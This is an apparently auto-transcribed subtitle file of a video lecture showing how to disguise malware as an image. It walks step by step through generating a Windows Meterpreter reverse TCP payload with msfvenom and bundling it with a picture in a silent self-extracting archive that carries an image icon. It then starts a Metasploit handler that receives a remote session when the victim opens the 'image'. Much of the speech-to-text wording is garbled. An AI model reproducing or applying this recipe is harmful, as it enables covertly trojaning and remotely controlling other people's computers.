1
00:00:08,790 --> 00:00:16,770
Welcome in this lecture we are going to see how to hide or embed our malware in a normal image basically

2
00:00:16,780 --> 00:00:24,360
here where we integrate about modify with the help of MSF when I'm on my tablet and emailing that profile

3
00:00:24,600 --> 00:00:25,640
in environment.

4
00:00:25,650 --> 00:00:31,030
Image when you click on open that image file we get a better deal.

5
00:00:31,510 --> 00:00:34,090
From here we can control a lot of the machine.

6
00:00:35,050 --> 00:00:38,600
So let's see how go to this no.

7
00:00:38,590 --> 00:00:49,770
So we need to create our medical file to embed in image so open the terminal and I MSF and an iPhone

8
00:00:49,860 --> 00:01:00,290
be windows slash my reporter slash reward and the score at DCP here haven't been indicates which payload

9
00:01:00,370 --> 00:01:02,090
we use.

10
00:01:02,140 --> 00:01:09,550
Next we need to enter a host or local host IP to listen everyone's connection from that machine.

11
00:01:09,890 --> 00:01:18,620
We can get to a local IP address by typing if config here is your local IP address.

12
00:01:18,620 --> 00:01:20,080
Copy and paste hit

13
00:01:23,200 --> 00:01:31,070
now enter the airport or local host port number on which the connection is to listen for the victim.

14
00:01:31,250 --> 00:01:43,640
Here we are using what number 44 44 next to enter hyphen which indicates the format of and last into

15
00:01:43,650 --> 00:01:49,330
the part where you want to save your metadata file.

16
00:01:49,520 --> 00:01:58,400
It will take some time to generate reload as you can see a lot of reload is set this religion data now

17
00:01:58,460 --> 00:02:04,180
our next step is to attach this payload with image to do this.

18
00:02:04,200 --> 00:02:09,940
First we need to send this better file through our system.

19
00:02:09,950 --> 00:02:17,700
Here is our payload and normal image in which we are going to embed our payload next.

20
00:02:17,710 --> 00:02:28,550
We need to convert this image file to icon so open it browser and type ISP or convert to now.

21
00:02:28,600 --> 00:02:30,330
Click on this link.

22
00:02:30,580 --> 00:02:32,250
Next choose your image.

23
00:02:34,190 --> 00:02:37,610
And set a icon solution as 64 pixels.

24
00:02:38,710 --> 00:02:43,750
Large select with that it would click on convert.

25
00:02:45,550 --> 00:02:49,330
As you can see our selected image is connected to icon

26
00:02:54,250 --> 00:02:56,970
now selected would reload and image file.

27
00:02:58,220 --> 00:03:06,810
Right click and select add to it you know Jane the name of your output file here.

28
00:03:06,810 --> 00:03:18,250
I hope you and Ben now select the compress method to best next I'm going to select a two option as great

29
00:03:18,340 --> 00:03:26,200
as effects or self extracting that you not need a new order compression software as a fix.

30
00:03:26,220 --> 00:03:34,410
To you failed to extract just double click the SFX are a executable file and it will be extracted automatically

31
00:03:36,510 --> 00:03:42,480
next go to a normal setting and select as the Fix option go to set.

32
00:03:44,330 --> 00:03:49,250
Here you need to enter your board be alert and image names with their extension

33
00:03:52,460 --> 00:03:57,900
no go to more and select had all option here.

34
00:03:58,020 --> 00:03:59,970
Display all is a default selector.

35
00:04:00,930 --> 00:04:08,010
However if you want to create a suffix are you expecting all files and folders that are glued to a specified

36
00:04:08,010 --> 00:04:12,390
location such as next door without showing a window.

37
00:04:12,390 --> 00:04:15,870
So we need to select hide all option.

38
00:04:15,870 --> 00:04:20,470
Next we need to set a goal to reload which we can order.

39
00:04:20,850 --> 00:04:31,780
Now click on load and select your icon last go to update option in main menu select extract and a bit

40
00:04:31,780 --> 00:04:33,640
files in a bit more.

41
00:04:33,640 --> 00:04:36,960
And what white all files in automate more.

42
00:04:38,970 --> 00:04:42,260
As you can see a new image file is created.

43
00:04:43,750 --> 00:04:49,260
So before we understand this image file with him we need to create a handler.

44
00:04:49,300 --> 00:04:52,650
Will you send it it was collection from aggregate machine.

45
00:04:52,960 --> 00:04:56,480
Here we are going to use my displayed framework to listen.

46
00:04:56,490 --> 00:05:00,460
Edwards connection so type MSF console

47
00:05:03,270 --> 00:05:04,770
noticed that handler.

48
00:05:04,770 --> 00:05:12,460
I use exploit slash multi slash handler.

49
00:05:12,680 --> 00:05:22,820
Next thing we need to set reload so type set reload windows slash interpreter slash reverse on the score

50
00:05:22,880 --> 00:05:30,900
PSP similarly to set a load and it'll put on which we had are willing to listen it it was connection

51
00:05:31,680 --> 00:05:40,040
so type set the host wanted to do 160 it would be free to do.

52
00:05:40,670 --> 00:05:52,650
No that airport I said l put wood for food for last paper on two starkly and

53
00:05:55,810 --> 00:06:03,940
so here I have taken my own windows machine for demonstration but it was now let's try to open this

54
00:06:03,940 --> 00:06:16,150
image as you can see that immediate open and regarding position in terminal so that's how the hacker

55
00:06:16,250 --> 00:06:21,460
embed their malware in not one image it thank you.